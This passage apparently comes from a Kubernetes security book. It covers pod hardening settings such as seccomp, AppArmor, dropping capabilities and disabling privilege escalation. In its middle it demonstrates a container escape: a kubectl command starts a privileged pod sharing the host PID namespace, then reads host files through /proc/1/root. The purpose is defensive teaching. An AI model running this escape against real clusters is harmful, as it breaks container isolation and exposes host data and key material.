Set supplementalGroups to nonzero.

Set fsGroup to nonzero.

allowPrivilegeEscalation

Restricts escalation to root privileges.

Set to false. This measure is required to effectively enforce runAsUser: MustRunAsNonRoot settings.

SELinux

Sets the SELinux context of the container.

If the environment supports SELinux, consider adding SELinux labeling to further harden the container.

AppArmor annotations

Sets the AppArmor profile used by containers.

Where possible, harden containerized applications by employing AppArmor to constrain exploitation.

seccomp annotations

Sets the seccomp profile used to sandbox containers.

Where possible, use a seccomp auditing profile to identify required syscalls for running applications; then enable a seccomp profile to block all other syscalls.

Let’s explore these in more detail using the kubesec static analysis tool, and the selectors it uses to interrogate your Kubernetes resources.

.spec .hostPID

hostPID allows traversal from the container to the host through the /proc filesystem, which symlinks other processes’ root filesystems. To read from the host’s process namespace, privileged is needed as well:

user@host $ OVERRIDES='{"spec":{"hostPID": true,''"containers":[{"name":"1",'
user@host $ OVERRIDES+='"image":"alpine","command":["/bin/ash"],''"stdin": true,'
user@host $ OVERRIDES+='"tty":true,"imagePullPolicy":"IfNotPresent",'
user@host $ OVERRIDES+='"securityContext":{"privileged":true}}]}}'

user@host $ kubectl run privileged-and-hostpid --restart=Never -it --rm \
  --image noop --overrides "${OVERRIDES}" 1

/ # grep PRETTY_NAME /etc/*release* 2
PRETTY_NAME="Alpine Linux v3.14"

/ # ps faux | head 3
PID   USER     TIME  COMMAND
    1 root      0:07 /usr/lib/systemd/systemd noresume noswap cros_efi
    2 root      0:00 [kthreadd]
    3 root      0:00 [rcu_gp]
    4 root      0:00 [rcu_par_gp]
    6 root      0:00 [kworker/0:0H-kb]
    9 root      0:00 [mm_percpu_wq]
   10 root      0:00 [ksoftirqd/0]
   11 root      1:33 [rcu_sched]
   12 root      0:00 [migration/0]

/ # grep PRETTY_NAME /proc/1/root/etc/*release 4
/proc/1/root/etc/os-release:PRETTY_NAME="Container-Optimized OS from Google"
1

Start a privileged container and share the host process namespace.

2

As the root user in the container, check the container’s operating system version.

3

Verify we’re in the host’s process namespace (we can see PID 1, and kernel helper processes).

4

Check the distribution version of the host, via the /proc filesystem inside the containe. This is possible because the PID namespace is shared with the host.

Note

Without privileged, the host process namespace is inaccessible to root in the container:

/ $ grep PRETTY_NAME /proc/1/root/etc/*release*
grep: /proc/1/root/etc/*release*: Permission denied

In this case the attacker is limited to searching the filesystem or memory as their UID allows, hunting for key material or sensitive data.

containers[] .securityContext .capabilities .drop | index(“ALL”)

You should always drop all capabilities and only readd those that your application needs to operate.

Into the Eye of the Storm

The Captain and crew have had a fruitless raid, but this is not the last we will hear of their escapades.

As we progress through this book, we will see how Kubernetes pod components interact with the wider system, and we will witness Captain Hashjack’s efforts to exploit them.

Conclusion

There are multiple layers of configuration to secure for a pod to be used safely, and the workloads you run are the soft underbelly of Kubernetes security.

The pod is the first line of defense and the most important part of a cluster to protect. Application code changes frequently and is likely to be a source of potentially exploitable bugs.

To extend the anchor and chain metaphor, a cluster is only a strong as its weakest link. In order to be provably secure, you must use robust configuration testing, preventative control and policy in the pipeline and admission control, and runtime intrusion detection—as nothing is infallible.